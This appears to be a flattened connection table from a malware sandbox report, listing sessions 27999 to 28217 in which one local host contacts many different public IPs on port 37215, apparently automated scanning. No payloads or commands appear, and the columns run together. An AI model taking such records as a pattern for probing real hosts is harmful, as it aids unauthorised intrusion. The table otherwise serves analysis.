                                              27999192.168.2.1548074122.102.73.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28000192.168.2.1547826190.109.42.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28001192.168.2.1547012156.162.236.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28002192.168.2.1543958222.95.214.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28003192.168.2.1533682138.134.44.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28004192.168.2.1538266121.169.250.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28005192.168.2.1548832111.29.222.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28006192.168.2.1544248102.193.55.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28007192.168.2.1539168122.169.7.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28008192.168.2.1549026181.240.156.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28009192.168.2.1536584138.54.173.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28010192.168.2.1534478222.56.217.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28011192.168.2.1545874138.125.130.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28012192.168.2.154482045.253.69.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28013192.168.2.1545990181.74.196.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28014192.168.2.156063094.248.241.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28015192.168.2.1551918197.144.20.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28016192.168.2.1534800122.40.104.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28017192.168.2.1538256190.18.195.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28018192.168.2.1547750157.98.80.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28019192.168.2.1548214222.255.37.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28020192.168.2.1533688102.70.237.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28021192.168.2.1558990186.109.230.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28022192.168.2.153304841.167.4.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28023192.168.2.1559826197.130.59.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28024192.168.2.153963445.25.160.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28025192.168.2.1533018138.81.60.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28026192.168.2.1537500122.247.98.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28027192.168.2.1550566109.227.224.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28028192.168.2.154233037.17.220.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28029192.168.2.1555048181.148.77.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28030192.168.2.1540146102.77.193.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28031192.168.2.155520045.88.153.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28032192.168.2.155734894.4.93.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28033192.168.2.1560996102.56.189.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28034192.168.2.154551045.82.252.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28035192.168.2.1556184156.119.132.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28036192.168.2.1546980186.84.172.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28037192.168.2.1544264186.24.30.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28038192.168.2.1540290156.153.187.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28039192.168.2.153918631.46.28.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28040192.168.2.154989031.123.30.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28041192.168.2.1558570138.168.191.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28042192.168.2.154290631.187.239.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28043192.168.2.1533190138.231.121.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28044192.168.2.153829294.23.91.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28045192.168.2.1546722222.194.158.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28046192.168.2.153929845.130.94.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28047192.168.2.1552962156.100.238.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28048192.168.2.1547248157.111.95.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28049192.168.2.1552052190.33.158.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28050192.168.2.1542360102.140.55.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28051192.168.2.1537766157.20.69.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28052192.168.2.1542092197.50.21.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28053192.168.2.155220841.239.239.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28054192.168.2.154112831.102.30.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28055192.168.2.153569245.236.146.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28056192.168.2.153676894.189.4.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28057192.168.2.1546394181.74.95.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28058192.168.2.1545676181.81.254.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28059192.168.2.1543424181.233.141.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28060192.168.2.1533190138.97.115.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28061192.168.2.1559208122.19.152.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28062192.168.2.155465445.50.240.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28063192.168.2.1543316186.172.35.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28064192.168.2.1535328102.20.239.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28065192.168.2.153877641.164.54.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28066192.168.2.1559338186.230.74.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28067192.168.2.154772445.129.229.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28068192.168.2.1535320157.184.159.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28069192.168.2.155312845.6.219.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28070192.168.2.1545506181.101.90.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28071192.168.2.1548824138.201.224.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28072192.168.2.155342894.253.217.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28073192.168.2.1540620190.1.142.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28074192.168.2.1560414186.159.164.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28075192.168.2.1533442207.247.132.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28076192.168.2.1538038222.197.211.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28077192.168.2.1537316102.234.137.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28078192.168.2.1544126102.12.233.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28079192.168.2.1559092186.242.71.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28080192.168.2.154252094.115.123.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28081192.168.2.155355245.0.136.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28082192.168.2.155356231.130.116.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28083192.168.2.155151645.132.115.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28084192.168.2.1553882186.167.237.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28085192.168.2.1551708138.93.110.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28086192.168.2.1554006190.116.76.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28087192.168.2.1551312121.52.161.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28088192.168.2.154859094.95.47.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28089192.168.2.1547878138.17.64.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28090192.168.2.1536618121.6.102.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28091192.168.2.153576431.88.205.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28092192.168.2.1539944122.251.194.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28093192.168.2.153718641.253.2.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28094192.168.2.1544928181.6.252.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28095192.168.2.154762437.96.52.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28096192.168.2.1542202156.107.18.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28097192.168.2.155203441.37.107.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28098192.168.2.1535582156.255.183.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28099192.168.2.1534496190.18.148.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28100192.168.2.1533252157.110.236.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28101192.168.2.1536526197.56.87.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28102192.168.2.1551334186.194.78.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28103192.168.2.1534308121.152.20.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28104192.168.2.1547338156.253.61.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28105192.168.2.1547532121.101.30.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28106192.168.2.154822637.31.36.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28107192.168.2.1551112157.43.13.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28108192.168.2.1548302186.77.219.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28109192.168.2.155704831.122.177.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28110192.168.2.1551548138.89.188.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28111192.168.2.1539616181.1.167.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28112192.168.2.1546986197.57.108.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28113192.168.2.153397241.187.53.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28114192.168.2.1541872156.172.253.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28115192.168.2.155029494.190.163.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28116192.168.2.153717631.62.2.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28117192.168.2.1541424157.49.135.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28118192.168.2.153501841.137.140.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28119192.168.2.1544198186.26.116.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28120192.168.2.153419441.9.160.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28121192.168.2.1539894197.60.2.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28122192.168.2.1537228181.143.29.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28123192.168.2.1554264197.218.20.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28124192.168.2.1543660122.58.144.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28125192.168.2.1536326190.62.156.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28126192.168.2.1532916186.96.177.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28127192.168.2.153891245.252.81.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28128192.168.2.1544824122.91.70.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28129192.168.2.1548174181.252.109.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28130192.168.2.1533994121.31.116.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28131192.168.2.1546592157.100.118.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28132192.168.2.1552484156.42.74.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28133192.168.2.154288245.103.102.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28134192.168.2.1555074190.57.46.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28135192.168.2.154210445.162.106.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28136192.168.2.1560292138.101.31.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28137192.168.2.153637031.146.25.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28138192.168.2.1552364121.204.222.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28139192.168.2.1553576181.24.135.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28140192.168.2.1553936222.43.0.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28141192.168.2.1542986222.107.12.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28142192.168.2.1549762222.180.42.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28143192.168.2.1539252222.206.60.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28144192.168.2.1546052138.34.73.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28145192.168.2.1553338222.189.197.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28146192.168.2.1550604190.242.225.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28147192.168.2.1534844190.8.47.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28148192.168.2.1532838197.101.175.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28149192.168.2.1546844186.249.41.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28150192.168.2.1542438190.56.175.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28151192.168.2.1543082138.12.238.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28152192.168.2.1559506121.152.21.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28153192.168.2.154287887.4.146.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28154192.168.2.1546604158.252.125.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28155192.168.2.1556942197.37.139.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28156192.168.2.1549544222.190.53.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28157192.168.2.1548188122.205.254.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28158192.168.2.1543088121.72.235.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28159192.168.2.154579841.41.44.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28160192.168.2.1557044222.138.178.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28161192.168.2.1535346222.210.173.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28162192.168.2.1554370197.79.80.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28163192.168.2.1560888157.34.168.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28164192.168.2.155671045.70.15.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28165192.168.2.155914437.188.1.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28166192.168.2.155745637.22.179.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28167192.168.2.1533726121.87.208.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28168192.168.2.1536096157.207.242.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28169192.168.2.1548458102.189.48.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28170192.168.2.1548718181.141.219.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28171192.168.2.155956245.194.68.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28172192.168.2.1559470122.241.31.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28173192.168.2.155248294.186.97.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28174192.168.2.1539492102.55.86.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28175192.168.2.1556380102.222.249.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28176192.168.2.153954031.63.114.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28177192.168.2.1550562156.232.246.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28178192.168.2.155959637.57.182.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28179192.168.2.1535122138.92.119.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28180192.168.2.155036431.15.60.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28181192.168.2.1547680121.66.125.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28182192.168.2.154916037.230.137.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28183192.168.2.1556156197.212.236.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28184192.168.2.153443441.53.220.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28185192.168.2.1543548156.191.21.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28186192.168.2.1543596190.7.53.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28187192.168.2.1544650190.154.104.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28188192.168.2.155478694.250.132.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28189192.168.2.1557350181.23.161.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28190192.168.2.1544538102.77.219.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28191192.168.2.153353683.46.100.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28192192.168.2.153949645.141.253.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28193192.168.2.1556852138.158.253.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28194192.168.2.1559568222.82.188.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28195192.168.2.155667845.252.123.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28196192.168.2.1549458102.119.125.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28197192.168.2.1551942121.64.5.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28198192.168.2.1554888181.177.247.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28199192.168.2.1549388197.73.87.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28200192.168.2.1541260157.109.245.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28201192.168.2.1560330222.238.10.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28202192.168.2.1559514156.50.126.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28203192.168.2.1543160122.37.189.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28204192.168.2.155987041.21.215.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28205192.168.2.155833631.41.195.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28206192.168.2.155383245.133.182.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28207192.168.2.1540988181.143.250.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28208192.168.2.155105041.162.218.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28209192.168.2.153353031.121.12.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28210192.168.2.1533258156.32.81.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28211192.168.2.153559245.199.166.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28212192.168.2.1546160138.82.165.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28213192.168.2.1559924157.221.87.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28214192.168.2.1541726138.160.128.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28215192.168.2.1541256222.226.223.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28216192.168.2.1547558122.97.73.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28217192.168.2.154299460.183.42.14137215
